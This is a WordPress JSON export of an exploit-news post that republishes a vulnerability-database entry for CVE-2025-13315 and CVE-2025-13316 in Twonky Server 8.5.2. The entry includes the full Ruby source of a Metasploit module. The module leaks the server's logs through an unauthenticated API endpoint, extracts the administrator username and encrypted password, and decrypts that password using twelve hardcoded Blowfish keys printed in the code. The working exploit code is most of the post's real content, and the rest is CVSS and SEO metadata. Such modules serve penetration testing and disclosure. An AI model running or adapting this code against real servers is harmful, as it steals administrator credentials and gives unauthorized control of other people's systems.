{"id":27947,"date":"2025-11-28T13:39:55","date_gmt":"2025-11-28T13:39:55","guid":{"rendered":"http:\/\/localhost\/?p=27947"},"modified":"2025-11-28T13:39:55","modified_gmt":"2025-11-28T13:39:55","slug":"twonky-server-log-leak-authentication-bypass","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27947","title":{"rendered":"Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-28T19:04:44&#8243;,&#8221;description&#8221;:&#8221;This module leverages an authentication bypass in Twonky Server 8.5.2. By exploiting an authorization flaw to access a privileged web API endpoint and leak application logs, encrypted administrator credentials are leaked CVE-2025-13315. The exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-28T18:56:59&#8243;,&#8221;modified&#8221;:&#8221;2025-11-28T18:56:59&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Twonky Server Log Leak Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-13315&#8243;,&#8221;CVE-2025-13316&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n  include Msf::Exploit::Remote::HttpClient\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Twonky Server Log Leak Authentication Bypass&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module leverages an authentication bypass in Twonky Server 8.5.2. By exploiting\\n          an authorization flaw to access a privileged web API endpoint and leak application logs,\\n          encrypted administrator credentials are leaked (CVE-2025-13315). The exploit will then decrypt\\n          these credentials using hardcoded keys (CVE-2025-13316) and login as the administrator.\\n          Expected module output is a username and plain text password for the administrator account.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;remmons-r7&#8217; # Initial discovery, MSF module\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2025-13315&#8217;],\\n          [&#8216;CVE&#8217;, &#8216;2025-13316&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/www.rapid7.com\/blog\/post\/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed\/&#8217;]\\n        ],\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          # No IoCs, in logs or individual files, are known\\n          # If a non-default reverse proxy is configured in front of Twonky Server, it may log web traffic\\n          &#8216;SideEffects&#8217; =\\u003e [],\\n          &#8216;Reliability&#8217; =\\u003e []\\n        }\\n      )\\n    )\\n\\n    register_options(\\n      [\\n        Opt::RPORT(9000),\\n        OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;The URI path to Twonky Server&#8217;, &#8216;\/&#8217;])\\n      ]\\n    )\\n  end\\n\\n  def run\\n    # Unauthenticated requests to the &#8216;\/dev0\/desc.xml&#8217; endpoint should return the version number\\n    print_status(&#8216;Confirming the target is vulnerable&#8217;)\\n    res = send_request_cgi(\\n      {\\n        &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n        &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;dev0&#8217;, &#8216;desc.xml&#8217;)\\n      }\\n    )\\n\\n    fail_with(Failure::Unknown, &#8216;Connection failed &#8211; unable to get XML web response&#8217;) unless res\\n\\n    # Confirm that the response contains the expected 8.5.2 XML string\\n    if (res\\u0026.code != 200) || (!res.body.include? &#8216;\\u003cmodelNumber\\u003e8.5.2\\u003c\/modelNumber\\u003e&#8217;)\\n      fail_with(Failure::NotVulnerable, &#8216;The target does not appear to be a Twonky Server instance running version 8.5.2&#8217;)\\n    end\\n\\n    print_good(&#8216;The target is Twonky Server v8.5.2&#8217;)\\n\\n    print_status(&#8216;Attempting to leak the administrator username and encrypted password&#8217;)\\n    res = send_request_cgi(\\n      {\\n        &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n        &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;nmc&#8217;, &#8216;rpc&#8217;, &#8216;log_getfile&#8217;)\\n      }\\n    )\\n\\n    fail_with(Failure::Unknown, &#8216;Connection failed &#8211; unable to get log API response&#8217;) unless res\\n\\n    # Grab the most recent (last) administrator username value from the logs\\n    pattern = \/ accessuser\\\\s*=\\\\s*(\\\\S+)\/\\n    result = res.body.scan(pattern).last\\n\\n    # If the log has been cleared since startup or the server hasn&#8217;t restarted since setup\\n    fail_with(Failure::NotFound, &#8216;The target did not return a log file containing a username value&#8217;) unless result\\n\\n    username = result[0]\\n\\n    print_good(\\&#8221;The target returned the administrator username: #{username}\\&#8221;)\\n\\n    # Grab the most recent (last) password value from the logs to decrypt\\n    # \\&#8221;||\\&#8221; + hex number (key index) + hex Blowfish ECB ciphertext\\n    pattern = \/\\\\|\\\\|([0-9A-F]){1}([a-fA-F0-9]+)\/\\n    result = res.body.scan(pattern).last\\n\\n    # If the log has been cleared since the last password change or the server hasn&#8217;t restarted since setup\\n    fail_with(Failure::NotFound, &#8216;The target did not return a log file containing a password value&#8217;) unless result\\n\\n    # Extract the encryption key index as base16\\n    enc_key_index = result[0]\\n\\n    # Handle possible match array containing more than minimum 16 chars (longer encrypted password)\\n    if !result[2].nil?\\n      enc_pwd = result[1] + result[2..].join\\n    else\\n      enc_pwd = result[1]\\n    end\\n\\n    print_good(\\&#8221;The target returned the encrypted password and key index: #{enc_pwd}, #{enc_key_index}\\&#8221;)\\n\\n    # Decrypt the admin password using static key\\n    password = decrypt_password(enc_pwd, enc_key_index)\\n\\n    print_good(\\&#8221;Credentials decrypted: USER=#{username} PASS=#{password}\\&#8221;)\\n\\n    report_vuln(\\n      host: rhost,\\n      name: name,\\n      refs: references\\n    )\\n\\n    store_loot(&#8216;Twonky Server Credentials&#8217;, &#8216;text\/plain&#8217;, datastore[&#8216;RHOST&#8217;], \\&#8221;Username: \\\\\\&#8221;#{username}\\\\\\&#8221; Password: \\\\\\&#8221;#{password}\\\\\\&#8221;\\&#8221;)\\n  end\\n\\n  # Decrypt the password using Blowfish ECB with the specified encryption key\\n  def decrypt_password(pwd, key_num)\\n    # Twonky Server 8.5.2 uses static encryption keys for passwords\\n    static_keys = [\\n      &#8216;E8ctd4jZwMbaV587&#8217;,\\n      &#8216;TGFWfWuW3cw28trN&#8217;,\\n      &#8216;pgqYY2g9atVpTzjY&#8217;,\\n      &#8216;KX7q4gmQvWtA8878&#8217;,\\n      &#8216;VJjh7ujyT8R5bR39&#8217;,\\n      &#8216;ZMWkaLp9bKyV6tXv&#8217;,\\n      &#8216;KMLvvq6my7uKkpxf&#8217;,\\n      &#8216;jwEkNvuwYCjsDzf5&#8217;,\\n      &#8216;FukE5DhdsbCjuKay&#8217;,\\n      &#8216;SpKNj6qYQGjuGMdd&#8217;,\\n      &#8216;qLyXuAHPTF2cPGWj&#8217;,\\n      &#8216;rKz7NBhM3vYg85mg&#8217;\\n    ]\\n\\n    # Encrypted password hex to bytes\\n    pwd_bytes = [pwd].pack(&#8216;H*&#8217;)\\n\\n    # Select the appropriate key, based on the index hex number stored with the ciphertext\\n    key = static_keys[key_num.to_i(16)]\\n\\n    print_status(\\&#8221;Decrypting password using key: #{key}\\&#8221;)\\n\\n    cipher = OpenSSL::Cipher.new(&#8216;bf-ecb&#8217;).decrypt\\n    cipher.key_len = key.length\\n    cipher.padding = 0\\n    cipher.key = key\\n    cipher.update(pwd_bytes) + cipher.final\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/twonky_authbypass_logleak.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.3,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/twonky_authbypass_logleak\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-28T19:04:44&#8243;,&#8221;description&#8221;:&#8221;This module leverages an authentication bypass in Twonky Server 8.5.2. By exploiting an authorization flaw to access a privileged web API endpoint and leak application&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,169,13,7,11,5],"class_list":["post-27947","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27947\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-28T19:04:44&#8243;,&#8221;description&#8221;:&#8221;This module leverages an authentication bypass in Twonky Server 8.5.2. By exploiting an authorization flaw to access a privileged web API endpoint and leak application...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27947\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-28T13:39:55+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27947#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27947\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK-\",\"datePublished\":\"2025-11-28T13:39:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27947\"},\"wordCount\":1041,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27947#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27947\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27947\",\"name\":\"Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-28T13:39:55+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27947#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27947\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27947#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27947","og_locale":"en_US","og_type":"article","og_title":"Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-28T19:04:44&#8243;,&#8221;description&#8221;:&#8221;This module leverages an authentication bypass in Twonky Server 8.5.2. By exploiting an authorization flaw to access a privileged web API endpoint and leak application...","og_url":"https:\/\/zero.redgem.net\/?p=27947","og_site_name":"zero redgem","article_published_time":"2025-11-28T13:39:55+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27947#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27947"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK-","datePublished":"2025-11-28T13:39:55+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27947"},"wordCount":1041,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27947#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27947","url":"https:\/\/zero.redgem.net\/?p=27947","name":"Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-28T13:39:55+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27947#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27947"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27947#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Twonky Server Log Leak Authentication Bypass_MSF:AUXILIARY-GATHER-TWONKY_AUTHBYPASS_LOGLEAK-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27947"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27947\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27947"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}